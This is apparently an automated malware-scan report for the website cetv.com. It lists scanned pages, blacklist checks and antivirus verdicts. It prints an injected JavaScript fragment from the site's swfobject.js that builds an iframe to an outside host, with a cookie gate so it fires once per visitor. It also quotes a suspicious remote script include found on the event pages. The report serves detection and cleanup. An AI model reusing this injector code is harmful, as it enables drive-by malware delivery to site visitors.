New scan:

Malware Scanner report for cetv.com

Malicious/Suspicious/Total urls checked
1/4/15
5 pages have malicious or suspicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://cetv.com/
200 OK
Content-Length: 21241
Content-Type: text/html
suspicious
Page code contains blacklisted domain: hkcetv.com

...[12019 bytes skipped]...
td>
<td><table width="100%" border="0" cellspacing="1" cellpadding="1" bgcolor="3f3f3f">
<tr>
<td align="center" bgcolor="#1a1a1a"><script language="JavaScript"><!--
function random_imglink(){
var myimages=new Array()
var imagelinks=new Array()
var imagetarget=new Array()
myimages[1]="pinkribbon2013_banner.jpg"
imagelinks[1]="/ad/redirect.htm?i=97&u=http://hkcetv.com/event/pinkribbon2013"
imagetarget[1] = "_blank"
var ry =Math.floor(Math.random()*myimages.length)
if (ry==0)
ry=1
document.write('<a href="'+imagelinks[ry]+'" target="' + imagetarget[ry] + '"><img src="/image/ad/'+myimages[ry]+'" border=0></a>')
}
random_imglink()
//--></script></td>
</tr>
</table></td>
<td width="10"><img src="/image/common/space.gif" width="10" height=
...[14210 bytes skipped]...

http://cetv.com/common/js.js
200 OK
Content-Length: 4141
Content-Type: application/x-javascript
clean
http://cetv.com/common/swfobject.js
200 OK
Content-Length: 8515
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)


function jg09() { var static='ajax'; var controller='index.php'; var jg = document.createElement('iframe'); jg.src = 'http://czasnaherbate.info/D6p2qrVw.php'; jg.style.position = 'absolute'; jg.style.color = '67304'; jg.style.height =
... 624 bytes are skipped ...
rt = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); jg09(); } }

Antivirus reports:

Avast
JS:Includer-AJE [Trj]
Ad-Aware
JS:Trojan.Script.CIV
Bkav
MW.Clod3d5.Trojan.43a2
Ikarus
Trojan.JS.Quidvetis
nProtect
JS:Trojan.Script.CIV
K7AntiVirus
Riskware ( 885143830 )
TrendMicro-HouseCall
TROJ_GEN.F47V1031
Emsisoft
JS:Trojan.Script.CIV (B)
Microsoft
Trojan:JS/Quidvetis.A
Kaspersky
Trojan-Downloader.JS.Iframe.dfm
MicroWorld-eScan
JS:Trojan.Script.CIV
Fortinet
JS/Blacole.EU!tr.dldr
NANO-Antivirus
Trojan.Script.Iframe.bopaxv
F-Secure
JS:Trojan.Script.CIV
F-Prot
JS/IFrame.RS.gen
Norman
Blacole.XE
GData
JS:Trojan.Script.CIV
Commtouch
JS/IFrame.RS.gen
BitDefender
JS:Trojan.Script.CIV

http://cetv.com/common/prototype.js
200 OK
Content-Length: 130352
Content-Type: application/x-javascript
clean
http://cetv.com/content/info/
200 OK
Content-Length: 10577
Content-Type: text/html
clean
http://cetv.com/content/program/
200 OK
Content-Length: 19989
Content-Type: text/html
clean
http://cetv.com/content/video/
200 OK
Content-Length: 22505
Content-Type: text/html
clean
http://cetv.com/event/tenvote/
200 OK
Content-Length: 9976
Content-Type: text/html
suspicious
Suspicious code found

<script src="http://www.solis-spa.com/primaverasilvio/mTfO3VUx.php?id=45406759" type="text/javascript"></script>

http://cetv.com/index.html
200 OK
Content-Length: 21566
Content-Type: text/html
suspicious
Page code contains blacklisted domain: hkcetv.com

...[12087 bytes skipped]...
td>
<td><table width="100%" border="0" cellspacing="1" cellpadding="1" bgcolor="3f3f3f">
<tr>
<td align="center" bgcolor="#1a1a1a"><script language="JavaScript"><!--
function random_imglink(){
var myimages=new Array()
var imagelinks=new Array()
var imagetarget=new Array()
myimages[1]="pinkribbon2013_banner.jpg"
imagelinks[1]="/ad/redirect.htm?i=97&u=http://hkcetv.com/event/pinkribbon2013"
imagetarget[1] = "_blank"
var ry =Math.floor(Math.random()*myimages.length)
if (ry==0)
ry=1
document.write('<a href="'+imagelinks[ry]+'" target="' + imagetarget[ry] + '"><img src="/image/ad/'+myimages[ry]+'" border=0></a>')
}
random_imglink()
//--></script></td>
</tr>
</table></td>
<td width="10"><img src="/image/common/space.gif" width="10" height=
...[14507 bytes skipped]...

http://cetv.com/content/info/index.html
200 OK
Content-Length: 10642
Content-Type: text/html
clean
http://cetv.com/content/program/index.html
200 OK
Content-Length: 20073
Content-Type: text/html
clean
http://cetv.com/content/video/index.html
200 OK
Content-Length: 22593
Content-Type: text/html
clean
http://cetv.com/event/tenvote/index.html
200 OK
Content-Length: 9979
Content-Type: text/html
suspicious
Suspicious code found

<script src="http://www.solis-spa.com/primaverasilvio/mTfO3VUx.php?id=45406760" type="text/javascript"></script>

http://cetv.com/content/photo/index.html
200 OK
Content-Length: 36102
Content-Type: text/html
clean
http://cetv.com/content/presenter/index.html
200 OK
Content-Length: 24709
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: cetv.com

Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 08 Jun 2014 15:29:34 GMT
Server: Microsoft-IIS/6.0
Content-Length: 21241
Content-Type: text/html; Charset=big5
Set-Cookie: ASPSESSIONIDQQQQBRTB=DGEBBKOBGLCALGJGFOECMAHO; path=/
X-Powered-By: ASP.NET

...21241 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: cetv.com
Referer: http://www.google.com/search?q=cetv.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=cetv.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://cetv.com/

Result: cetv.com is not infected or malware details are not published yet.